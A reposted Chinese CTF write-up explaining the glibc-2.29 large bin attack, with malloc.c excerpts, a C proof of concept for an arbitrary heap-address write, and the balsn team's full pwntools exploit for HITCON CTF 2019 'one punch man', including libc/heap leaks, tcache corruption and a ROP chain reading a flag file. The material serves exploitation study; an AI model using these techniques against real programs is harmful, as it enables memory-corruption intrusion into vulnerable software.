glibc-2.29 large bin attack 原理

最新推荐文章于 2023-12-15 11:18:56 发布
最新推荐文章于 2023-12-15 11:18:56 发布
阅读量1k 收藏 1
点赞数
原文链接:https://mp.weixin.qq.com/s/a8SVgUBSa6ajJWeoSwmb3w
版权

glibc-2.29 large bin attack 原理

原创: 星盟安全团队 星盟安全

该方法并非笔者发现,而是阅读 balsn 的 writeup 时分析而得到的,这里介绍一下这种攻击方法。

unsorted bin attack
在介绍新的攻击技术之前,先来缅怀一下 unsorted bin attack , 由于 glibc-2.29 新上的保护措施,使得 unsorted bin attack 基本已经成为过去式。

unsorted bin attack的原理是利用 unsortedbin 在解链时,对 fd 指针的操作,直接的作用就是可以任意地址写入一个 main_arena 地址值,非常好用的攻击方法。虽然 glibc-2.29 不能使用 unsorted bin attack 了,但是 large bin attack 或许可以成为它的代替品。

large bin attack
glibc-2.29 的 large bin attack 和先前的并不完全一样,但是原理类似。
其主要发生在 large bin 的 nextsize 成环时,没有对其进行检查,所以只要存在 UAF 漏洞,就能修改 nextsize 指针进行任意地址写入 chunk 地址的操作。

漏洞主要发生在下列代码(来自 glibc-2.29/malloc/malloc.c:3841 ):

victim_index = largebin_index (size);
        bck =bin_at (av, victim_index);
        fwd =bck->fd;
 
        /* maintainlarge bins in sorted order */
        if (fwd !=bck)
          {
            /* Orwith inuse bit to speed comparisons */
            size |=PREV_INUSE;
            /* if smaller than smallest, bypassloop below */
            assert(chunk_main_arena (bck->bk));
            if ((unsignedlong) (size)
    < (unsigned long)chunksize_nomask (bck->bk))
              {
                fwd= bck;
                bck = bck->bk;
 
               victim->fd_nextsize = fwd->fd;
               victim->bk_nextsize = fwd->fd->bk_nextsize; // one
               fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize =victim;
              }
            else
              {
               assert (chunk_main_arena (fwd));
                while((unsigned long) size < chunksize_nomask (fwd))
                  {
                   fwd = fwd->fd_nextsize;
  assert(chunk_main_arena (fwd));
                  }
 
                // but size must be different
                if((unsigned long) size
  == (unsigned long)chunksize_nomask (fwd))
                  /*Always insert in the second position.  */
                 fwd = fwd->fd;
                else
                  {
                   victim->fd_nextsize = fwd;
                   victim->bk_nextsize = fwd->bk_nextsize;
                   fwd->bk_nextsize = victim;
                   victim->bk_nextsize->fd_nextsize = victim; // two
                  }
                bck = fwd->bk;
              }
          }
        else
         victim->fd_nextsize = victim->bk_nextsize = victim;

large bin 是以 victimindex 为单位进行 nextsize 之间的成环操作,每个 victimindex 的长度是 0x40,上面的代码是 unsorted bin 进行归位 操作时,将 本属于该环的 victim 插入到该环中。但是这里却没有unsorted bin 那样对指针进行检查。

由于 large bin 是双向链表,插入操作并不会对整个环进行检查,这里我们只需要劫持 其bk_nextsize 指针,那么在插入的时候,程序便会把该假的地址当成一个真的 chunk 从而进行双向链表插入操作,这样就会使得该要插入的 chunk 将会留下它的地址到我们 设置的任意地址。

其核心代码是victim->bk_nextsize = fwd->fd->bk_nextsize; // one或者victim->bk_nextsize->fd_nextsize = victim; // two,就是在这里完成了写操作,具体执行哪段代码还要取决与两个chunk 的size 比较。

这里提醒一点,两个chunk 的size不能相同,否则会执行下面程序流而导致不能实现我们的目的。


if ((unsigned long) size
  == (unsigned long)chunksize_nomask (fwd))
  /* Always insertin the second position.  */
  fwd = fwd->fd;

其次是 large bin 的 fdnextsize 需要设置为0,否则程序流会执行到下面的代码进行unlink 操作,那么就无法通过 unlink 对 large bin 的 bknextsize 和fd_nextsize 检查。
来自 glibc-2.29/malloc/malloc.c:4049

size = chunksize(victim);
 
  /*  We know the first chunk in this bin is bigenough to use. */
  assert ((unsignedlong) (size) >= (unsigned long) (nb));
 
  remainder_size =size - nb;
 
  /* unlink */
  unlink_chunk (av,victim);

样例代码

#include <stdio.h>
#include <stdlib.h>
 
size_t buf[0x10];
 
int main()
{
    size_t *ptr,*ptr2, *ptr3;
    setbuf(stdout, NULL);
 
    ptr = malloc(0x438);
    malloc(0x18);
    ptr2 = malloc(0x448);
    malloc(0x18);
    free(ptr);
    // put ptr intolarge bin
    malloc(0x600);
    free(ptr2);
    ptr[2] = 0;
    ptr[3] = (size_t)&buf[0];
 
    printf("buf[4]:0x%lx\n", buf[4]);
    ptr3 = malloc(0x68);
    printf("buf[4]:0x%lx\n", buf[4]);
 
    return 0;
}

buf[4]就相当于 fakechunk->fdnextsize 指针,指向该节点的上一个节点。

执行结果如下所示:

buf[4]: 0x0
buf[4]: 0x560075a246b0

例题 - HITCON CTF 2019 PWN - one punch man
文件链接:https://github.com/Ex-Origin/ctf-writeups/tree/master/hitconctf2019/pwn/onepunchman。
该程序主要的漏洞就是在delete时没有清理指针,导致UAF。

void delete()
{
  unsigned int v0; //[rsp+Ch] [rbp-4h]
 
  write_str("idx:");
  v0 = get_int();
  if ( v0 > 2 )
    error((__int64)"invalid");
  free((void*)heros[v0].calloc_ptr);
}

程序预置了后门函数,但是在tcache上有限制,必须要我们劫持tcache_perthread_struct才行,这里有两种思路,我自己的做法是劫持tcache_perthread_struct->entries,这里由于和本文章关系不大,这里我简要说下核心思路:利用tcache_perthread_struct->counts 伪造 size,然后利用 unlink 使得chunk overlap,然后控制其tcache_perthread_struct->entries。

第二种做法就是 balsn 战队的做法,很优秀的方法,核心思路就是利用large bin attack修改 tcache_perthread_struct->counts 来使用预置后门,然后用add 当中的缓冲区进行 ROP。
下面是 balsn 的脚本。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys
import time
import random
host = '52.198.120.1'
port = 48763
 
r = process('./one_punch')
 
binary = "./one_punch"
context.binary = binary
elf = ELF(binary)
try:
  libc = ELF("./libc-2.29.so")
  log.success("libcload success")
  system_off =libc.symbols.system
  log.success("system_off= "+hex(system_off))
except:
  log.failure("libcnot found !")
 
def name(index, name):
  r.recvuntil(">")
  r.sendline("1")
  r.recvuntil(":")
 r.sendline(str(index))
  r.recvuntil(":")
  r.send(name)
  pass
 
def rename(index,name):
  r.recvuntil(">")
  r.sendline("2")
  r.recvuntil(":")
 r.sendline(str(index))
  r.recvuntil(":")
  r.send(name)
 
  pass
 
def d(index):
  r.recvuntil(">")
  r.sendline("4")
  r.recvuntil(":")
 r.sendline(str(index))
  pass
 
def show(index):
  r.recvuntil(">")
  r.sendline("3")
  r.recvuntil(":")
  r.sendline(str(index))
 
def magic(data):
  r.recvuntil(">")
  r.sendline(str(0xc388))
  time.sleep(0.1)
  r.send(data)
 
# if len(sys.argv) == 1:
#   r =process([binary, "0"],env={"LD_LIBRARY_PATH":"."})
 
# else:
#   r = remote(host,port)
 
if __name__ == '__main__':
  name(0,"A"*0x210)
  d(0)
  name(1,"A"*0x210)
  d(1)
  show(1)
  r.recvuntil("name: ")
  heap =u64(r.recv(6).ljust(8,"\x00")) - 0x260
  print("heap= {}".format(hex(heap)))
  for i in xrange(5):
    name(2,"A"*0x210)
    d(2)
  name(0,"A"*0x210)
  name(1,"A"*0x210)
  d(0)
  show(0)
  r.recvuntil("name: ")
  libc =u64(r.recv(6).ljust(8,"\x00")) - 0x1e4ca0
  print("libc= {}".format(hex(libc)))
  d(1)
  rename(2,p64(libc+ 0x1e4c30))
 
  name(0,"D"*0x90)
  d(0)
  for i in xrange(7):
    name(0,"D"*0x80)
    d(0)
  for i in xrange(7):
    name(0,"D"*0x200)
    d(0)
 
  name(0,"D"*0x200)
  name(1,"A"*0x210)
  name(2,p64(0x21)*(0x90/8))
  rename(2,p64(0x21)*(0x90/8))
  d(2)
  name(2,p64(0x21)*(0x90/8))
  rename(2,p64(0x21)*(0x90/8))
  d(2)
 
  d(0)
  d(1)
  name(0,"A"*0x80)
  name(1,"A"*0x80)
  d(0)
  d(1)
  name(0,"A"*0x88+ p64(0x421) + "D"*0x180 )
  name(2,"A"*0x200)
  d(1)
  d(2)
  name(2,"A"*0x200)
  rename(0,"A"*0x88+ p64(0x421) + p64(libc + 0x1e5090)*2 + p64(0) + p64(heap+0x10) )
  d(0)
  d(2)
 
  // pause()
  name(0,"/home/ctf/flag\x00\x00"+ "A"*0x1f0)
  magic("A")
  add_rsp48 = libc+ 0x000000000008cfd6
  pop_rdi = libc + 0x0000000000026542
  pop_rsi = libc + 0x0000000000026f9e
  pop_rdx = libc + 0x000000000012bda6
  pop_rax = libc + 0x0000000000047cf8
  syscall = libc + 0xcf6c5
  magic(p64(add_rsp48))
 
  name(0,p64(pop_rdi)+ p64(heap + 0x24d0) + p64(pop_rsi) + p64(0) + p64(pop_rax) + p64(2) +p64(syscall) +
      p64(pop_rdi)+ p64(3) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(0x100) + p64(pop_rax)+ p64(0) + p64(syscall) +
      p64(pop_rdi)+ p64(1) + p64(pop_rsi) + p64(heap) + p64(pop_rdx) + p64(0x100) + p64(pop_rax)+ p64(1) + p64(syscall)
      )
r.interactive()

在上面的// pause()处暂停,查看其bin情况。

pwndbg> largebins
largebins
0x400: 0x56224269a4c0 —▸ 0x7f455f1dd090 (main_arena+1104)◂—0x56224269a4c0
pwndbg> x/6gx 0x56224269a4c0
0x56224269a4c0:   0x4141414141414141 0x0000000000000421
0x56224269a4d0:   0x00007f455f1dd090 0x00007f455f1dd090
0x56224269a4e0:   0x0000000000000000 0x0000562242698010
pwndbg>

这里构造好了 large bin attack,当进行 unsorted bin 归位时,便会修改tcache_perthread_struct->counts。
笔者是星盟安全团队成员之一,这里欢迎热爱网络安全的小伙伴们加入星盟安全:XHUwMDc4XHUwMDY5XHUwMDZlXHUwMDY3XHUwMDZkXHUwMDY1XHUwMDZlXHUwMDY3XHUwMDVmXHUwMDczXHUwMDY1XHUwMDYzXHUwMDQwXHUwMDMxXHUwMDM2XHUwMDMzXHUwMDJlXHUwMDYzXHUwMDZmXHUwMDZk。

——————————————————
更多资讯欢迎关注星盟安全公众号:
在这里插入图片描述

TUANZI_Dum
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
glibc-2.29
10-23
glibc 升级到 2.29版本 解决报错libm.so.6: version `GLIBC_2.29' not found
Largebin Attack原理详解
qq_41252520的博客
08-07 1431
攻击成效:能够向任意地址写堆地址,常配合其他攻击手法实现getshell。条件:能够修改Largebin−>bkLargebin−>bk。研究环境:Glibc2.31\textcolor{green}{研究环境:Glibc2.31}研究环境:Glibc2.31现在总结一下Largebin attack的一些利用条件和步骤。能够修改Largebin中的块的字段。程序中至少能够分配三种属于Largebin的不同大小的块。分配一块大小。...
glibc-2.29.tar.gz
07-11
GUN发布的2019版本C语言标准库函数 上传保存一份,以备后续之用
glibc-2.29.zip
08-25
glibc是GNU发布的libc库,即c运行库。glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc, 在制作docker alpine镜像可以需要用到他
glibc-2.29-11-ge28ad442e73b00ae2047d89c8cc7f9b2a0de5436.tar.gz
07-28
glibc-2.29:构建现代Linux系统的基石》 glibc,全称为GNU C Library,是GNU项目的一部分,是Linux系统中最核心的库之一,为应用程序提供大量的C语言接口。glibc-2.29是这个库的一个特定版本,它的出现对于系统...
linux系统glibc-2.29
08-30
linux系统libc库glibc-2.29glibcglibc-2.29
glibc-2.29源码包
07-20
glibc-2.29源码包 glibc-2.29源码包 glibc-2.29源码包
Large bin attack
abelxu
11-26 1865
0x01 large bin Large bins 中一共包括 63 个 bin,index为64~126,每个 bin 中的 chunk 的大小不一致,而是处于一定区间范围内。(本文讨论的代码和结构都是在glibc2.23 64位的情况) 1.largebin的一些结构 在largebin的处理过程中会用到fd_next和bk_nextsize来加快chunk的处理。 struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of
glibc-2.29.tar.xz
07-07
2019-01-31: glibc 2.29 released. gnu c 运行库源代码
Linux64位 安装 32位文件报错 /lib/ld-linux.so.2: bad ELF interpreter: No such file or directory
ArvinWoo
11-03 2149
1、在64系统里执行32位程序如果出现/lib/ld-linux.so.2: bad ELF interpreter: No such file or directory,安装下glic即可 yum install glibc.i686 2、error while loading shared libraries: libz.so.1: cannot open shared object fi...
glibc-2.29学习(上)
weixin_44145820的博客
05-28 1161
堆利用在CTF的PWN题目中一直占比较大,而最近的比赛的平台也逐渐从Ubuntu16,Ubuntu18向Ubuntu19甚至更高版本转移,为此学习一下libc-2.29中新的特性对做题还是很有帮助的 libc-2.29新变化 libc-2.29中修改了对tcache_entry的定义,通过注释我们也能看出新增加的key是为了检测double free的,如下 /* We overlay this structure on the user-data portion of a chunk when t
好好说话之Large Bin Attack
hollk’s blog
01-20 4441
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
GLIBC(2.29)内存管理
Amazing
04-02 1845
1. GLIBC tcache机制 GLIBC自从2.26版本开始,增加了tcache(thread local caching)机制,旨在提高GLIBC内存管理性能。tcache机制利用了线程私有数据结构,以达到无锁状态下快速内存管理。tcache机制在编译时通过USE_TCACHE进行控制,默认是打开的。 在GLIBC中,将会为每个线程均维持一个tcache结构,...
RedHat8升级GLIBC_2.29,解决ImportError: /lib64/libm.so.6: version `GLIBC_2.29
运维giao的博客
10-24 1160
在本地将glibc-2.29进行编译,然后根据python脚本执行报错所给出的路径信息,将glibc-2.29编译后的libm-2.29.so与/lib64/下的libm.so.6重新做个软连接,其他底层的依赖版本不进行更改。在网上查了很多方法,都太建议升级glibc版本,对系统影响比较大,而且升级起来很麻烦,很多底层的依赖也要跟着升级。目前已经在ubuntu系统上是没问题的,但又不想重装系统,所以还是选择了在系统本地升级glibc版本。其他报错也可以按照我这个方案进行软连接替换,提示什么就替换什么。
实测Centos7,8升级到glibc2.29
Angel、骷髅博客
03-17 8476
实测Centos7,8升级到glibc2.29成功
基于CentOS更新 glibc - 解决 `GLIBC_2.29‘ not found
热门推荐
翔底的博客
11-06 1万+
前面使用源代码安装参考了 GNU C 的官方文档,文档的描述很详细,但是没有说明更新后不能使用的情况。使用 rpm 包很考验耐心,最后还是会因为包之间相互依赖而导致问题,真的很烦。
glibc-2.23_large_bin链接方式_浅析
weixin_30906701的博客
03-26 64
上面两个图应该合并为一个图,但是指针太多了,合并在一起看不清了,所以分成两张图 所有的块都通过fd和bk两个指针链接,但是为了加快查询速度,不同大小的chunk通过fd_nextsize和bk_nextsize两个指针再做一次链接 B和C块的大小是一样的,所以没有通过fd_nextsize和bk_nextsize链接。而A和B和D大小不一样,多以都需要再链接一次。 那么这样做有什么...
version `GLIBC_2.29‘ not found 的原因和怎么解决问题
最新发布
闲人的专栏
12-15 1万+
程序上经常有在这台Linux上编译,然后放到另一个Linux上运行的情况。如果Linux版本差别不大或都是ubuntu或centos系列还好。如果不是一个系列很容易出现GLIBC 找不到的情况。尤其是ubuntu上编译,然后放到centos系列。因为centos为了追求所谓的稳定,基本用的都是N年前的东西,生怕用新的东西把它给搞的不安全了。
glibc-2.29 下载
07-09
要从官方网站下载 glibc-2.29,首先需要访问 GNU C Library(glibc)的官方网站。在浏览器中输入 https://www.gnu.org/software/libc/download.html,然后找到 glibc-2.29 的下载链接。 点击该下载链接后,会打开一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值